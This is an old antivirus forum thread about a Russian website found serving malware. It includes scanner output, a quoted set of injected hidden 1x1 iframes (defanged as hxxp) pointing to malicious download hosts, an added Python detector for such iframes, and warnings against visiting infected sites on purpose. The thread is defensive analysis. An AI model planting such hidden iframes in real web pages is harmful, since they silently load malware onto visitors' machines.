Author Topic: nasha-russia.tv - HTML:Iframe-inf  (Read 9039 times)

sewaq

  • Guest
nasha-russia.tv - HTML:Iframe-inf
« on: April 29, 2009, 01:27:06 PM »
hxxp://nasha-russia.tv/

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1660
  • I wish I could write longer personal text!!
    • Homepage
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #1 on: April 29, 2009, 01:35:27 PM »
A virus or unwanted program has been detected
in the HTTP data on the requested page.

Requested URL:   hxxp://nasha-russia.tv/
Information:        Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus
Twitter: OmidFarhangEn - OS: Manjaro KDE

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #2 on: April 29, 2009, 09:56:25 PM »
Hi sewaq,

DrWeb's av link checker gives it as red - infected -
Checking: hxtp://nasha-russia.tv/
Engine version: 5.0.0.12182
Total virus-finding records: 539455
File size: 45.05 KB
File MD5: 4c7dd71d5934d7cab5a3aeefe3dfd339

hxtp://nasha-russia.tv/ - archive HTML
>hxtp://nasha-russia.tv//JavaScript.0 - Ok
>hxtp://nasha-russia.tv//Script.1 - Ok
>hxtp://nasha-russia.tv//Script.2 - Ok
>hxtp://nasha-russia.tv//Script.3 - Ok
>hxtp://nasha-russia.tv//Script.4 - Ok
>hxtp://nasha-russia.tv//Script.5 - Ok
>hxtp://nasha-russia.tv//JavaScript.6 - Ok
>hxtp://nasha-russia.tv//JavaScript1.1.7 - Ok
>hxtp://nasha-russia.tv//JavaScript1.2.8 - Ok
>hxtp://nasha-russia.tv//JavaScript1.3.9 - Ok
>hxtp://nasha-russia.tv//JavaScript.10 - Ok
>hxtp://nasha-russia.tv//JavaScript.11 - Ok
hxtp://nasha-russia.tv/ - Ok

Checking: hxtp://pagead2.googlesyndication.com/pagead/show_ads.js
File size: 29.44 KB
File MD5: 24c7aba78e61147132b46e48e6743e71

hxtp://pagead2.googlesyndication.com/pagead/show_ads.js - Ok

Checking: hxtp://lotbetworld.cn/in.cgi?income36
File size: 8978 bytes
File MD5: 98ccf1db761c14c99d26177ac88722b1

hxtp://lotbetworld.cn/in.cgi?income36 - archive MAIL
hxtp://lotbetworld.cn/in.cgi?income36/ - archive HTML
>hxtp://lotbetworld.cn/in.cgi?income36//Script.0 infected with Trojan.DownLoad.35036

Checking: hxtp://nasha-russia.tv/includes/jscript.js
File size: 2849 bytes
File MD5: 50f24195e48db586910fffb5f7f5a614

hxtp://nasha-russia.tv/includes/jscript.js - Ok
Re: hxtp://virusinfo.info/showthread.php?t=44061

polonus
« Last Edit: April 29, 2009, 10:00:17 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

CharleyO

  • Guest
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #3 on: April 29, 2009, 10:12:28 PM »
***

Well, Polonus beat me to it but here is a little more information.

One iframe infection is outside the html tag at the top of the page and looks like this :

<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
(I changed the http to hxxp to disable the link)

I counted at least 12 JavaScript infections throughout the page.

There are 2 more iframe infections outside the html tag at the bottom of the page :

<iframe src="hxxp://google-ana1yticz.com/?click=486812" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>

Click the images below to enlarge.


***
« Last Edit: April 29, 2009, 10:15:52 PM by CharleyO »
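
The pattern described in the post above (1x1 iframes with `visibility: hidden`, placed before `<html>` or after `</html>`) can be checked for statically. The following is an added example, not part of any post in this thread; `HiddenIframeFinder`, `is_tiny` and `scan` are hypothetical names, and the sample page is constructed around the defanged iframes quoted above.

```python
import re
from html.parser import HTMLParser
# Constructed page: the three hidden iframes are the defanged ones quoted in
# this thread; video.example is a made-up legitimate embed for contrast.
SAMPLE = """<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
<html><head><title>constructed page</title></head>
<body><iframe src="https://video.example/embed/1" width="640" height="360"></iframe></body></html>
<iframe src="hxxp://google-ana1yticz.com/?click=486812" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
"""

def is_tiny(value):
    # True for a width/height of 0 or 1, the usual "invisible" frame size.
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1

class HiddenIframeFinder(HTMLParser):
    """HTMLParser only tokenizes, so an iframe outside <html> stays outside."""
    def __init__(self):
        super().__init__()
        self.inside_html = False
        self.findings = []  # (line, src, [reasons])

    def handle_starttag(self, tag, attrs):
        self.inside_html = self.inside_html or tag == "html"
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = re.sub(r"\s+", "", a.get("style", "").lower())
        checks = {
            "outside-html": not self.inside_html,
            "tiny": is_tiny(a.get("width")) and is_tiny(a.get("height")),
            "css-hidden": "visibility:hidden" in style or "display:none" in style,
        }
        reasons = [name for name, hit in checks.items() if hit]
        if reasons:
            self.findings.append((self.getpos()[0], a.get("src", ""), reasons))

    def handle_endtag(self, tag):
        if tag == "html":
            self.inside_html = False

def scan(page):
    finder = HiddenIframeFinder()
    finder.feed(page)
    finder.close()
    return finder.findings

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

A visible, normally sized iframe inside the body is not reported; one that is visible but sits outside the `<html>` element is still reported on placement alone.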

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #4 on: April 29, 2009, 10:36:53 PM »
Went to the site without pro version and got infected. :-X
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

CharleyO

  • Guest
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #5 on: April 30, 2009, 12:52:59 AM »
***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #6 on: April 30, 2009, 02:16:20 AM »
> Since Polonus and I had already checked it out, why did you go there?    ???
>
> We already said it was infected. You need a little more experience before doing such things.

I wanted to see what the virus does. ;D Besides, I think I can remove the virus via Boot-Time Scanning!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #7 on: April 30, 2009, 02:32:31 AM »
Hi Donovansrb10,

People that download viruses to see what they do aren't just average users. These people download viruses in special lab settings, where they cannot infect outside a virtual machine. They have to take a lot of precautions and need a lot of special analyzing tools. Well, if you download Vitro file infector, you can see what is meant; if you do that you can completely f-disk, format and re-install your operating system, so-called total recall, not a nice thing to experience, seeing your computer being ruined by a virus. Malware is no plaything, and malware should be kept from computers by all means. The real hero here is the man or woman or kid that did not have a virus for years and years, because he or she or it is computer-savvy and security aware.

polonus

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #8 on: April 30, 2009, 03:19:46 AM »
That goes double when you have absolutely no idea what the payload at the other end of the link could be.

One member who I would also say is more experienced tried this and without a robust back-up and recovery strategy (hard disk imaging, etc.) he ended up formatting his system and reinstalling everything. What he got hit by was Vitro/Virut and you only have to check this forum to see the destruction it wreaks, with most ending up on a fdisk, format and reinstall.

So this strategy is IMHO totally stupid, unless you are on a test machine that you wipe after the test.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security